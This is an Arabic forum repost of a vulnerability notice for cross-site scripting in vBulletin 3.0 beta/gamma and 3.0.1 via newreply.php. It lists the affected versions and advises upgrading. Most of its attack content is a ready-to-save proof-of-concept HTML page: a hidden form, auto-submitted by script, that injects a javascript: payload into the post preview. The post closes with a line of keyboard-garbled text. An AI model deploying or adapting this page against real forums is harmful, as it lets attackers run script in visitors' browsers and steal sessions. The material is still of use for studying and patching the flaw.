منقول للفائدة العامة

###############

اثناء تصفحي لاحدي المنتديات وجدت هذا الموضوع يتكلم

هذه هي الثغرة الي اغلب المنتديات ماسلكت منها ..

الاصدارت المصابة هي:
VBulletin VBulletin 3.0 Gamma
VBulletin VBulletin 3.0 beta 7
VBulletin VBulletin 3.0 beta 6
VBulletin VBulletin 3.0 beta 5
VBulletin VBulletin 3.0 beta 4
VBulletin VBulletin 3.0 beta 3
VBulletin VBulletin 3.0 beta 2
VBulletin VBulletin 3.0.1

و هي Cross-Site Scripting Vulnerability







و الثغرة هي newreply.php ...و الحل السلمي لها تجديد اصدار المنتدى و تغييره ..

While a user is previewing the post, both newreply.php and newthread.php do sanitize the input in 'Preview', but Edit-panel does not. The result is that malicious HTML code can be injected through this hole. A page as below can lead a visitor to a Preview page that contains malicious code that performs a cross site scripting attack:

و هذا كود xss نحفظه على صفحه html






<form action="http://host/newreply.php" name="vbform"
method="post" style='visibility:hidden'>
<input name="WYSIWYG_HTML"
value="[img]java_script_:alert(document.xxxxxx)[/img]"/>
<input name="do" value="postreply"/>
<input name="t" value="123456" />
<input name="p" value="123456" />
<input type="submit" class="button" name="preview"/>
</form>
<script>
document.all.preview.click();
</script>

أنتهى

الجوكر !!


hghw]hvj hglwhfm lk lkj]dhj vb DF= hgp`v =DF